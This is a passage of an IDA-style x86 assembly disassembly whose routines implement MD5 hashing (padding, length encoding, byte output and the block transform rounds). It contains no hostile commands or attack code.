pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
